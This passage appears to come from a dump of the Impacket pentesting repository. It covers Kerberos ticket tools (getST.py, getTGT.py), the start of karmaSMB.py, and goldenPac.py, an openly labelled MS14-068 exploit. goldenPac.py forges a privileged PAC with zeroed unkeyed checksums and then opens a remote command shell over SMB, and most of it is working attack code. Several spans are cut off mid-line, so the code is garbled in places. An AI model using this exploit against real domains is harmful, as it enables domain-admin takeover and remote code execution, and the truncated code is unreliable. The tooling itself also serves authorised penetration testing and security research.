identified to the KDC by the user's name and realm.\n clientName = Principal(self.__behalfUser, type=constants.PrincipalNameType.NT_PRINCIPAL.value)\n\n S4UByteArray = struct.pack('= 0:\n logging.error('Probably user %s does not have constrained delegation permisions or impersonated user does not exist' % self.__user)\n if str(e).find('KDC_ERR_BADOPTION') >= 0:\n logging.error('Probably SPN is not allowed to delegate by user %s or initial TGT not forwardable' % self.__user)\n\n return\n self.__saveFileName = self.__options.impersonate\n\n self.saveTicket(tgs, oldSessionKey)\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Given a password, hash or aesKey, it will request a \"\n \"Service Ticket and save it as ccache\")\n parser.add_argument('identity', action='store', help='[domain/]username[:password]')\n parser.add_argument('-spn', action=\"store\", help='SPN (service/server) of the target service the '\n 'service ticket will' ' be generated for')\n parser.add_argument('-altservice', action=\"store\", help='New sname/SPN to set in the ticket')\n parser.add_argument('-dmsa', action='store_true', help='Use DMSA (Delegated Managed Service Accounts) ')\n parser.add_argument('-impersonate', action=\"store\", help='target username that will be impersonated (thru S4U2Self)'\n ' for quering the ST. Keep in mind this will only work if '\n 'the identity provided in this scripts is allowed for '\n 'delegation to the SPN specified')\n parser.add_argument('-additional-ticket', action='store', metavar='ticket.ccache', help='include a forwardable service ticket in a S4U2Proxy request for RBCD + KCD Kerberos only')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-u2u', dest='u2u', action='store_true', help='Request User-to-User ticket')\n parser.add_argument('-self', dest='no_s4u2proxy', action='store_true', help='Only do S4U2self, no S4U2proxy')\n parser.add_argument('-force-forwardable', action='store_true', help='Force the service ticket obtained through '\n 'S4U2Self to be forwardable. For best results, the -hashes and -aesKey values for the '\n 'specified -identity should be provided. This allows impresonation of protected users '\n 'and bypass of \"Kerberos-only\" constrained delegation restrictions. See CVE-2020-17049')\n parser.add_argument('-renew', action='store_true', help='Sets the RENEW ticket option to renew the TGT used for authentication. Set -spn to \\'krbtgt/DOMAINFQDN\\'')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar=\"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar=\"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store', metavar=\"ip address\", help='IP Address of the domain controller. If '\n 'omitted it use the domain part (FQDN) specified in the target parameter')\n\n if len(sys.argv) == 1:\n parser.print_help()\n print(\"\\nExamples: \")\n print(\"\\t./getST.py -spn cifs/contoso-dc -hashes lm:nt contoso.com/user\\n\")\n print(\"\\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked\")\n sys.exit(1)\n\n options = parser.parse_args()\n\n if not options.no_s4u2proxy and options.spn is None:\n parser.error(\"argument -spn is required, except when -self is set\")\n\n if options.no_s4u2proxy and options.impersonate is None:\n parser.error(\"argument -impersonate is required when doing S4U2self\")\n\n if options.no_s4u2proxy and options.altservice is not None:\n if '/' not in options.altservice:\n parser.error(\"When doing S4U2self only, substitution service must include service class AND name (i.e. CLASS/HOSTNAME@REALM, or CLASS/HOSTNAME)\")\n\n if options.additional_ticket is not None and options.impersonate is None:\n parser.error(\"argument -impersonate is required when doing S4U2proxy\")\n\n if options.u2u is not None and (options.no_s4u2proxy is None and options.impersonate is None):\n parser.error(\"-u2u is not implemented yet without being combined to S4U. Can't obtain a plain User-to-User ticket\")\n # implementing plain u2u would need to modify the getKerberosTGS() function and add a switch\n # in case of u2u, the proper flags should be added in the request, as well as a proper S_PRINCIPAL structure with the domain being set in order to target a UPN\n # the request would also need to embed an additional-ticket (the target user's TGT)\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.identity, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = GETST(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n\n traceback.print_exc()\n print(str(e))\n" }, { "path": "examples/getTGT.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# Given a password, hash or aesKey, it will request a TGT and save it as ccache\n#\n# Examples:\n# ./getTGT.py -hashes lm:nt contoso.com/user\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\nimport logging\nimport sys\nfrom binascii import unhexlify\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity\nfrom impacket.krb5.kerberosv5 import getKerberosTGT\nfrom impacket.krb5 import constants\nfrom impacket.krb5.types import Principal\n\n\nclass GETTGT:\n def __init__(self, target, password, domain, options):\n self.__password = password\n self.__user= target\n self.__domain = domain\n self.__lmhash = ''\n self.__nthash = ''\n self.__aesKey = options.aesKey\n self.__options = options\n self.__kdcHost = options.dc_ip\n self.__service = options.service\n if options.hashes is not None:\n self.__lmhash, self.__nthash = options.hashes.split(':')\n\n def saveTicket(self, ticket, sessionKey):\n logging.info('Saving ticket in %s' % (self.__user + '.ccache'))\n from impacket.krb5.ccache import CCache\n ccache = CCache()\n\n ccache.fromTGT(ticket, sessionKey, sessionKey)\n ccache.saveFile(self.__user + '.ccache')\n\n def run(self):\n userName = Principal(self.__user, type=options.principalType.value)\n tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName = userName,\n password = self.__password,\n domain = self.__domain,\n lmhash = unhexlify(self.__lmhash),\n nthash = unhexlify(self.__nthash),\n aesKey = self.__aesKey,\n kdcHost = self.__kdcHost,\n serverName = self.__service)\n self.saveTicket(tgt,oldSessionKey)\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help=True, description=\"Given a password, hash or aesKey, it will request a \"\n \"TGT and save it as ccache\")\n parser.add_argument('identity', action='store', help='[domain/]username[:password]')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n\n group = parser.add_argument_group('authentication')\n\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file '\n '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '\n 'ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication '\n '(128 or 256 bits)')\n group.add_argument('-dc-ip', action='store',metavar = \"ip address\", help='IP Address of the domain controller. If '\n 'ommited it use the domain part (FQDN) specified in the target parameter')\n group.add_argument('-service', action='store', metavar=\"SPN\", help='Request a Service Ticket directly through an AS-REQ')\n group.add_argument('-principalType', nargs=\"?\", type=lambda value: constants.PrincipalNameType[value.upper()] if value.upper() in constants.PrincipalNameType.__members__ else None, action='store', default=constants.PrincipalNameType.NT_PRINCIPAL, help='PrincipalType of the token, can be one of NT_UNKNOWN, NT_PRINCIPAL, NT_SRV_INST, NT_SRV_HST, NT_SRV_XHST, NT_UID, NT_SMTP_NAME, NT_ENTERPRISE, NT_WELLKNOWN, NT_SRV_HST_DOMAIN, NT_MS_PRINCIPAL, NT_MS_PRINCIPAL_AND_ID, NT_ENT_PRINCIPAL_AND_ID; default is NT_PRINCIPAL, ')\n\n if len(sys.argv)==1:\n parser.print_help()\n print(\"\\nExamples: \")\n print(\"\\t./getTGT.py -hashes lm:nt contoso.com/user\\n\")\n print(\"\\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked\")\n sys.exit(1)\n options = parser.parse_args()\n\n # Init the example's logger theme\n logger.init(options.ts, options.debug)\n\n domain, username, password, _, _, options.k = parse_identity(options.identity, options.hashes, options.no_pass, options.aesKey, options.k)\n \n if domain is None:\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n if options.principalType is None:\n logging.critical('Invalid principalType!')\n sys.exit(1)\n\n try:\n executer = GETTGT(username, password, domain, options)\n executer.run()\n except Exception as e:\n if logging.getLogger().level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n print(str(e))\n" }, { "path": "examples/goldenPac.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# MS14-068 Exploit. Kudos to @BiDOrD for pulling it up first!\n# Well done :).\n# This one also established a SMBConnection and PSEXEcs the\n# target.\n# A few important things:\n# 1) you must use the domain FQDN or use -dc-ip switch\n# 2) target must be a FQDN as well and matching the target's NetBIOS\n# 3) Just RC4 at the moment - DONE (aes256 added)\n# 4) It won't work on Kerberos-only Domains (but can be fixed)\n# 5) Use WMIEXEC approach instead\n#\n# E.G:\n# python goldenPac domain.net/normaluser@domain-host\n# the password will be asked, or\n#\n# python goldenPac.py domain.net/normaluser:mypwd@domain-host\n#\n# if domain.net and/or domain-host do not resolve, add them\n# to the hosts file or use the -dc-ip and -target-ip parameters\n#\n# Author:\n# Alberto Solino (@agsolino)\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport cmd\nimport logging\nimport os\nimport random\nimport string\nimport time\nfrom binascii import unhexlify\nfrom threading import Thread, Lock\nfrom six import PY3\n\nfrom impacket.dcerpc.v5 import epm\nfrom impacket.dcerpc.v5.drsuapi import MSRPC_UUID_DRSUAPI, hDRSDomainControllerInfo, DRSBind, NTDSAPI_CLIENT_GUID, \\\n DRS_EXTENSIONS_INT, DRS_EXT_GETCHGREQ_V6, DRS_EXT_GETCHGREPLY_V6, DRS_EXT_GETCHGREQ_V8, DRS_EXT_STRONG_ENCRYPTION, \\\n NULLGUID\nfrom impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5.lsad import hLsarQueryInformationPolicy2, POLICY_INFORMATION_CLASS, hLsarOpenPolicy2\nfrom impacket.dcerpc.v5.lsat import MSRPC_UUID_LSAT, POLICY_LOOKUP_NAMES\nfrom impacket.dcerpc.v5.nrpc import MSRPC_UUID_NRPC, hDsrGetDcNameEx\nfrom impacket.dcerpc.v5.rpcrt import TypeSerialization1, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY\nfrom impacket.krb5.pac import PKERB_VALIDATION_INFO, KERB_VALIDATION_INFO, KERB_SID_AND_ATTRIBUTES, PAC_CLIENT_INFO, \\\n PAC_SIGNATURE_DATA, PAC_INFO_BUFFER, PAC_LOGON_INFO, PAC_CLIENT_INFO_TYPE, PAC_SERVER_CHECKSUM, \\\n PAC_PRIVSVR_CHECKSUM, PACTYPE\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_target\nfrom impacket.examples import remcomsvc, serviceinstall\nfrom impacket.smbconnection import SMBConnection, smb\nfrom impacket.structure import Structure\n\n################################################################################\n# HELPER FUNCTIONS\n################################################################################\n\nclass RemComMessage(Structure):\n structure = (\n ('Command','4096s=\"\"'),\n ('WorkingDir','260s=\"\"'),\n ('Priority',' 0:\n try:\n s.waitNamedPipe(tid,pipe)\n pipeReady = True\n except Exception as e:\n print(str(e))\n tries -= 1\n time.sleep(2)\n pass\n\n if tries == 0:\n raise Exception('Pipe not ready, aborting')\n\n fid = s.openFile(tid,pipe,accessMask, creationOption = 0x40, fileAttributes = 0x80)\n\n return fid\n\nclass Pipes(Thread):\n def __init__(self, transport, pipe, permissions, TGS=None, share=None):\n Thread.__init__(self)\n self.server = 0\n self.transport = transport\n self.credentials = transport.get_credentials()\n self.tid = 0\n self.fid = 0\n self.share = share\n self.port = transport.get_dport()\n self.pipe = pipe\n self.permissions = permissions\n self.TGS = TGS\n self.daemon = True\n\n def connectPipe(self):\n try:\n lock.acquire()\n global dialect\n self.server = SMBConnection('*SMBSERVER', self.transport.get_smb_connection().getRemoteHost(),\n sess_port=self.port, preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n self.server.login(user, passwd, domain, lm, nt)\n lock.release()\n self.tid = self.server.connectTree('IPC$') \n\n self.server.waitNamedPipe(self.tid, self.pipe)\n self.fid = self.server.openFile(self.tid,self.pipe,self.permissions, creationOption = 0x40, fileAttributes = 0x80)\n self.server.setTimeout(1000000)\n except:\n logging.critical(\"Something wen't wrong connecting the pipes(%s), try again\" % self.__class__)\n\n\nclass RemoteStdOutPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n while True:\n try:\n ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n global LastDataSent\n if ans != LastDataSent:\n sys.stdout.write(ans.decode('cp437'))\n sys.stdout.flush()\n else:\n # Don't echo what I sent, and clear it up\n LastDataSent = ''\n # Just in case this got out of sync, i'm cleaning it up if there are more than 10 chars, \n # it will give false positives tho.. we should find a better way to handle this.\n if LastDataSent > 10:\n LastDataSent = ''\n except:\n pass\n\nclass RemoteStdErrPipe(Pipes):\n def __init__(self, transport, pipe, permisssions):\n Pipes.__init__(self, transport, pipe, permisssions)\n\n def run(self):\n self.connectPipe()\n while True:\n try:\n ans = self.server.readFile(self.tid,self.fid, 0, 1024)\n except:\n pass\n else:\n try:\n sys.stderr.write(str(ans))\n sys.stderr.flush()\n except:\n pass\n\nclass RemoteShell(cmd.Cmd):\n def __init__(self, server, port, credentials, tid, fid, TGS, share):\n cmd.Cmd.__init__(self, False)\n self.prompt = '\\x08'\n self.server = server\n self.transferClient = None\n self.tid = tid\n self.fid = fid\n self.credentials = credentials\n self.share = share\n self.port = port\n self.TGS = TGS\n self.intro = '[!] Press help for extra shell commands'\n\n def connect_transferClient(self):\n self.transferClient = SMBConnection('*SMBSERVER', self.server.getRemoteHost(), sess_port=self.port,\n preferredDialect=dialect)\n user, passwd, domain, lm, nt, aesKey, TGT, TGS = self.credentials\n self.transferClient.kerberosLogin(user, passwd, domain, lm, nt, aesKey, TGS=self.TGS, useCache=False)\n\n def do_help(self, line):\n print(\"\"\"\n lcd {path} - changes the current local directory to {path}\n exit - terminates the server process (and this session)\n put {src_file, dst_path} - uploads a local file to the dst_path RELATIVE to the connected share (%s)\n get {file} - downloads pathname RELATIVE to the connected share (%s) to the current local dir \n ! {cmd} - executes a local shell cmd\n\"\"\" % (self.share, self.share))\n self.send_data('\\r\\n', False)\n\n def do_shell(self, s):\n os.system(s)\n self.send_data('\\r\\n')\n\n def do_get(self, src_path):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n\n import ntpath\n filename = ntpath.basename(src_path)\n fh = open(filename,'wb')\n logging.info(\"Downloading %s\\\\%s\" % (self.share, src_path))\n self.transferClient.getFile(self.share, src_path, fh.write)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n pass\n\n self.send_data('\\r\\n')\n \n def do_put(self, s):\n try:\n if self.transferClient is None:\n self.connect_transferClient()\n params = s.split(' ')\n if len(params) > 1:\n src_path = params[0]\n dst_path = params[1]\n elif len(params) == 1:\n src_path = params[0]\n dst_path = '/'\n\n src_file = os.path.basename(src_path)\n fh = open(src_path, 'rb')\n f = dst_path + '/' + src_file\n pathname = f.replace('/','\\\\')\n logging.info(\"Uploading %s to %s\\\\%s\" % (src_file, self.share, dst_path))\n if PY3:\n self.transferClient.putFile(self.share, pathname, fh.read)\n else:\n self.transferClient.putFile(self.share, pathname.decode(sys.stdin.encoding), fh.read)\n fh.close()\n except Exception as e:\n logging.error(str(e))\n pass\n\n self.send_data('\\r\\n')\n\n\n def do_lcd(self, s):\n if s == '':\n print(os.getcwd())\n else:\n try:\n os.chdir(s)\n except Exception as e:\n logging.error(str(e))\n self.send_data('\\r\\n')\n\n def emptyline(self):\n self.send_data('\\r\\n')\n return\n\n def default(self, line):\n if PY3:\n self.send_data(line.encode('cp437')+b'\\r\\n')\n else:\n self.send_data(line.decode(sys.stdin.encoding).encode('cp437')+'\\r\\n')\n\n def send_data(self, data, hideOutput = True):\n if hideOutput is True:\n global LastDataSent\n LastDataSent = data\n else:\n LastDataSent = ''\n self.server.writeFile(self.tid, self.fid, data)\n\n\nclass RemoteStdInPipe(Pipes):\n def __init__(self, transport, pipe, permisssions, TGS=None, share=None):\n Pipes.__init__(self, transport, pipe, permisssions, TGS, share)\n\n def run(self):\n self.connectPipe()\n shell = RemoteShell(self.server, self.port, self.credentials, self.tid, self.fid, self.TGS, self.share)\n shell.cmdloop()\n\n\nclass MS14_068:\n # 6.1. Unkeyed Checksums\n # Vulnerable DCs are accepting at least these unkeyed checksum types\n CRC_32 = 1\n RSA_MD4 = 2\n RSA_MD5 = 7\n class VALIDATION_INFO(TypeSerialization1):\n structure = (\n ('Data', PKERB_VALIDATION_INFO),\n )\n\n def __init__(self, target, targetIp=None, username='', password='', domain='', hashes=None, command='',\n copyFile=None, writeTGT=None, kdcHost=None):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__rid = 0\n self.__lmhash = ''\n self.__nthash = ''\n self.__target = target\n self.__targetIp = targetIp\n self.__kdcHost = None\n self.__copyFile = copyFile\n self.__command = command\n self.__writeTGT = writeTGT\n self.__domainSid = ''\n self.__forestSid = None\n self.__domainControllers = list()\n self.__kdcHost = kdcHost\n\n if hashes is not None:\n self.__lmhash, self.__nthash = hashes.split(':')\n self.__lmhash = unhexlify(self.__lmhash)\n self.__nthash = unhexlify(self.__nthash)\n\n def getGoldenPAC(self, authTime):\n # Ok.. we need to build a PAC_TYPE with the following items\n\n # 1) KERB_VALIDATION_INFO\n aTime = timegm(strptime(str(authTime), '%Y%m%d%H%M%SZ'))\n\n unixTime = smb.POSIXtoFT(aTime)\n\n kerbdata = KERB_VALIDATION_INFO()\n\n kerbdata['LogonTime']['dwLowDateTime'] = unixTime & 0xffffffff\n kerbdata['LogonTime']['dwHighDateTime'] = unixTime >>32\n\n # LogoffTime: A FILETIME structure that contains the time the client's logon \n # session should expire. If the session should not expire, this structure \n # SHOULD have the dwHighDateTime member set to 0x7FFFFFFF and the dwLowDateTime \n # member set to 0xFFFFFFFF. A recipient of the PAC SHOULD<7> use this value as \n # an indicator of when to warn the user that the allowed time is due to expire.\n kerbdata['LogoffTime']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['LogoffTime']['dwHighDateTime'] = 0x7FFFFFFF\n\n # KickOffTime: A FILETIME structure that contains LogoffTime minus the user \n # account's forceLogoff attribute ([MS-ADA1] section 2.233) value. If the \n # client should not be logged off, this structure SHOULD have the dwHighDateTime \n # member set to 0x7FFFFFFF and the dwLowDateTime member set to 0xFFFFFFFF. \n # The Kerberos service ticket end time is a replacement for KickOffTime. \n # The service ticket lifetime SHOULD NOT be set longer than the KickOffTime of \n # an account. A recipient of the PAC SHOULD<8> use this value as the indicator \n # of when the client should be forcibly disconnected.\n kerbdata['KickOffTime']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['KickOffTime']['dwHighDateTime'] = 0x7FFFFFFF\n\n kerbdata['PasswordLastSet']['dwLowDateTime'] = 0\n kerbdata['PasswordLastSet']['dwHighDateTime'] = 0\n\n kerbdata['PasswordCanChange']['dwLowDateTime'] = 0\n kerbdata['PasswordCanChange']['dwHighDateTime'] = 0\n \n # PasswordMustChange: A FILETIME structure that contains the time at which\n # theclient's password expires. If the password will not expire, this \n # structure MUST have the dwHighDateTime member set to 0x7FFFFFFF and the \n # dwLowDateTime member set to 0xFFFFFFFF.\n kerbdata['PasswordMustChange']['dwLowDateTime'] = 0xFFFFFFFF\n kerbdata['PasswordMustChange']['dwHighDateTime'] = 0x7FFFFFFF\n\n kerbdata['EffectiveName'] = self.__username\n kerbdata['FullName'] = ''\n kerbdata['LogonScript'] = ''\n kerbdata['ProfilePath'] = ''\n kerbdata['HomeDirectory'] = ''\n kerbdata['HomeDirectoryDrive'] = ''\n kerbdata['LogonCount'] = 0\n kerbdata['BadPasswordCount'] = 0\n kerbdata['UserId'] = self.__rid\n kerbdata['PrimaryGroupId'] = 513\n \n # Our Golden Well-known groups! :)\n groups = (513, 512, 520, 518, 519)\n kerbdata['GroupCount'] = len(groups)\n\n for group in groups:\n groupMembership = GROUP_MEMBERSHIP()\n groupId = NDRULONG()\n groupId['Data'] = group\n groupMembership['RelativeId'] = groupId\n groupMembership['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n kerbdata['GroupIds'].append(groupMembership)\n\n kerbdata['UserFlags'] = 0\n kerbdata['UserSessionKey'] = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n kerbdata['LogonServer'] = ''\n kerbdata['LogonDomainName'] = self.__domain\n kerbdata['LogonDomainId'] = self.__domainSid\n kerbdata['LMKey'] = b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\n kerbdata['UserAccountControl']= USER_NORMAL_ACCOUNT | USER_DONT_EXPIRE_PASSWORD\n kerbdata['SubAuthStatus'] = 0\n kerbdata['LastSuccessfulILogon']['dwLowDateTime'] = 0\n kerbdata['LastSuccessfulILogon']['dwHighDateTime'] = 0\n kerbdata['LastFailedILogon']['dwLowDateTime'] = 0\n kerbdata['LastFailedILogon']['dwHighDateTime'] = 0\n kerbdata['FailedILogonCount'] = 0\n kerbdata['Reserved3'] = 0\n\n # AUTHENTICATION_AUTHORITY_ASSERTED_IDENTITY: A SID that means the client's identity is \n # asserted by an authentication authority based on proof of possession of client credentials.\n #extraSids = ('S-1-18-1',)\n if self.__forestSid is not None:\n extraSids = ('%s-%s' % (self.__forestSid, '519'),)\n kerbdata['SidCount'] = len(extraSids)\n kerbdata['UserFlags'] |= 0x20\n else:\n extraSids = ()\n kerbdata['SidCount'] = len(extraSids)\n \n for extraSid in extraSids:\n sidRecord = KERB_SID_AND_ATTRIBUTES()\n sid = RPC_SID()\n sid.fromCanonical(extraSid)\n sidRecord['Sid'] = sid\n sidRecord['Attributes'] = SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED\n kerbdata['ExtraSids'].append(sidRecord)\n\n kerbdata['ResourceGroupDomainSid'] = NULL\n kerbdata['ResourceGroupCount'] = 0\n kerbdata['ResourceGroupIds'] = NULL\n \n validationInfo = self.VALIDATION_INFO()\n validationInfo['Data'] = kerbdata\n\n if logging.getLogger().level == logging.DEBUG:\n logging.debug('VALIDATION_INFO')\n validationInfo.dump()\n print ('\\n')\n\n validationInfoBlob = validationInfo.getData() + validationInfo.getDataReferents()\n validationInfoAlignment = b'\\x00' * (((len(validationInfoBlob) + 7) // 8 * 8) - len(validationInfoBlob))\n\n # 2) PAC_CLIENT_INFO\n pacClientInfo = PAC_CLIENT_INFO()\n pacClientInfo['ClientId'] = unixTime\n try:\n name = self.__username.encode('utf-16le')\n except UnicodeDecodeError:\n import sys\n name = self.__username.decode(sys.getfilesystemencoding()).encode('utf-16le')\n pacClientInfo['NameLength'] = len(name)\n pacClientInfo['Name'] = name\n pacClientInfoBlob = pacClientInfo.getData()\n pacClientInfoAlignment = b'\\x00' * (((len(pacClientInfoBlob) + 7) // 8 * 8) - len(pacClientInfoBlob))\n\n # 3) PAC_SERVER_CHECKSUM/PAC_SIGNATURE_DATA\n serverChecksum = PAC_SIGNATURE_DATA()\n\n # If you wanna do CRC32, uncomment this\n #serverChecksum['SignatureType'] = self.CRC_32\n #serverChecksum['Signature'] = b'\\x00'*4\n\n # If you wanna do MD4, uncomment this\n #serverChecksum['SignatureType'] = self.RSA_MD4\n #serverChecksum['Signature'] = b'\\x00'*16\n\n # If you wanna do MD5, uncomment this\n serverChecksum['SignatureType'] = self.RSA_MD5\n serverChecksum['Signature'] = b'\\x00'*16\n\n serverChecksumBlob = serverChecksum.getData()\n serverChecksumAlignment = b'\\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob))\n\n # 4) PAC_PRIVSVR_CHECKSUM/PAC_SIGNATURE_DATA\n privSvrChecksum = PAC_SIGNATURE_DATA()\n\n # If you wanna do CRC32, uncomment this\n #privSvrChecksum['SignatureType'] = self.CRC_32\n #privSvrChecksum['Signature'] = b'\\x00'*4\n\n # If you wanna do MD4, uncomment this\n #privSvrChecksum['SignatureType'] = self.RSA_MD4\n #privSvrChecksum['Signature'] = b'\\x00'*16\n\n # If you wanna do MD5, uncomment this\n privSvrChecksum['SignatureType'] = self.RSA_MD5\n privSvrChecksum['Signature'] = b'\\x00'*16\n\n privSvrChecksumBlob = privSvrChecksum.getData()\n privSvrChecksumAlignment = b'\\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob))\n\n # The offset are set from the beginning of the PAC_TYPE\n # [MS-PAC] 2.4 PAC_INFO_BUFFER\n offsetData = 8 + len(PAC_INFO_BUFFER().getData())*4\n\n # Let's build the PAC_INFO_BUFFER for each one of the elements\n validationInfoIB = PAC_INFO_BUFFER()\n validationInfoIB['ulType'] = PAC_LOGON_INFO\n validationInfoIB['cbBufferSize'] = len(validationInfoBlob)\n validationInfoIB['Offset'] = offsetData\n offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8\n\n pacClientInfoIB = PAC_INFO_BUFFER()\n pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE\n pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob)\n pacClientInfoIB['Offset'] = offsetData\n offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8\n\n serverChecksumIB = PAC_INFO_BUFFER()\n serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM\n serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob)\n serverChecksumIB['Offset'] = offsetData\n offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8\n\n privSvrChecksumIB = PAC_INFO_BUFFER()\n privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM\n privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob)\n privSvrChecksumIB['Offset'] = offsetData\n #offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8\n\n # Building the PAC_TYPE as specified in [MS-PAC]\n buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \\\n privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \\\n pacClientInfo.getData() + pacClientInfoAlignment\n buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment\n\n pacType = PACTYPE()\n pacType['cBuffers'] = 4\n pacType['Version'] = 0\n pacType['Buffers'] = buffers + buffersTail\n\n blobToChecksum = pacType.getData()\n\n # If you want to do CRC-32, ucomment this\n #serverChecksum['Signature'] = struct.pack(' = \n# for example:\n# bat = /tmp/batchfile\n# com = /tmp/comfile\n# exe = /tmp/exefile\n#\n# The SMB2 support works with a caveat. If two different\n# filenames at the same share are requested, the first\n# one will work and the second one will not work if the request\n# is performed right away. This seems related to the\n# QUERY_DIRECTORY request, where we return the files available.\n# In the first try, we return the file that was asked to open.\n# In the second try, the client will NOT ask for another\n# QUERY_DIRECTORY but will use the cached one. This time the new file\n# is not there, so the client assumes it doesn't exist.\n# After a few seconds, looks like the client cache is cleared and\n# the operation works again. Further research is needed trying\n# to avoid this from happening.\n#\n# SMB1 seems to be working fine on that scenario.\n#\n# Author:\n# Alberto Solino (@agsolino)\n# Original idea by @mubix\n#\n# ToDo:\n# [ ] A lot of testing needed under different OSes.\n# I'm still not sure how reliable this approach is.\n# [ ] Add support for other SMB read commands. Right now just\n# covering SMB_COM_NT_CREATE_ANDX\n# [ ] Disable write request, now if the client tries to copy\n# a file back to us, it will overwrite the files we're\n# hosting. *CAREFUL!!!*\n#\n\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport logging\nimport ntpath\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser as ConfigParser\nfrom threading import Thread\n\nfrom impacket.examples import logger\nfrom impacket import smbserver, smb, version\nimport impacket.smb3structs as smb2\nfrom impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE\nfrom impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \\\n STATUS_OBJECT_PATH_NOT_FOUND\nfrom impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \\\n queryPathInformation\n\n\nclass KarmaSMBServer(Thread):\n def __init__(self, smb2Support = False):\n Thread.__init__(self)\n self.server = 0\n self.defaultFile = None\n self.extensions = {}\n\n # Here we write a mini config for the server\n smbConfig = 